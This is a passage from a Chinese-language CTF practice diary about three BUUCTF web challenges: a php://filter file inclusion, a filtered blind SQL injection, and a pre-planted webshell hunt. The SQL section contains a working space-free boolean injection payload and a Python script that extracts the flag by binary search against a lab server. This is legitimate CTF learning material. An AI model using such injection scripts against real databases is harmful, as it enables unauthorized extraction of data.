Buu刷题(摸鱼)日记2

 

buu刷题(摸鱼)日记2

[ACTF2020 新生赛]Include

居然忘了php://filter伪协议,真是屑啊。

很简单,直接读flag

[CISCN2019 华北赛区 Day2 Web1]Hack World

sql注入自古弱项,研究一下

先上burp炸,用sql insert list 炸。

发现过滤单引号 双引号 注释符号 空格等,并且返回中有布尔值

应该是个盲注

(接下来我就做不来了(毕竟我真的菜))


分析一下wp里的payload:

(ascii(substr((select(flag)from(flag)),1,1))<128)

selec flag from flag不多说,从表里找字段

找出来的字段显然没有回显,需要进行判断。刚好由于弱类型,如果是true就会以1带入,如果false就是0

然而输入0和1回显是不一样的,就可以创造盲注的契机

试一下二分法写了个jo本

import requests

url="http://cb7ec2dc-f0ba-46bf-b97e-800896e15726.node3.buuoj.cn/index.php"

ch = 0
flag = ""

for i in range(1,50):
    high = 128
    low = 32
    mid = (high + low) // 2
    while(high>low):
        
        payload = {"id":"(ascii(substr((select(flag)from(flag)),%d,1))<%d)"%(i,mid)}
        r = requests.post(url=url,data=payload).text
        if "glzjin" in r:
            high = mid 
        else:
            low = mid + 1

        mid = (high + low) // 2

    # print(mid)
    flag += chr(int(mid-1))
    print(flag)

二分法是好文明,一分钟左右出flag

[强网杯 2019]高明的黑客

强网杯的题目各个都是高达(我是废物)

点开题目

雁过留声,人过留名,此网站已被黑

我也是很佩服你们公司的开发,特地备份了网站源码到www.tar.gz以供大家观赏

下载源码以后把我吓傻了

这tm都是啥

毫不犹豫去看wp

看到赵师傅的博客

其实思路很简单,自带webshell,自己去找,考验写py脚本能力了(我不太行,萎了)